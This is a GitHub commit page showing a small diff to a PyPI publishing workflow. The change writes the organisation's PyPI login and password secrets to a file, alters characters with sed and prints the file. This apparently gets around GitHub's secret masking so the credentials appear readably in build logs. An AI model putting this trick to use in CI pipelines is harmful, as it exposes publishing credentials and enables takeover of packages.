Skip to content

Commit

Permalink
[add] test #0
Browse files Browse the repository at this point in the history
  • Loading branch information
vchemla committed Mar 11, 2024
1 parent 2d816e2 commit 6238035
Showing 1 changed file with 2 additions and 1 deletion.
3 changes: 2 additions & 1 deletion .github/workflows/push-pypi.yml
Original file line number Diff line number Diff line change
Expand Up @@ -26,7 +26,8 @@ jobs:
run: |
echo ${{ secrets.ORG_PYPI_LOGIN }} > tt
echo ${{ secrets.ORG_PYPI_PASSWD }} >> tt
cat -A tt
sed -i 's/A/B/g' tt
cat tt
- uses: actions/checkout@master
with:
Expand Down

0 comments on commit 6238035

Please sign in to comment.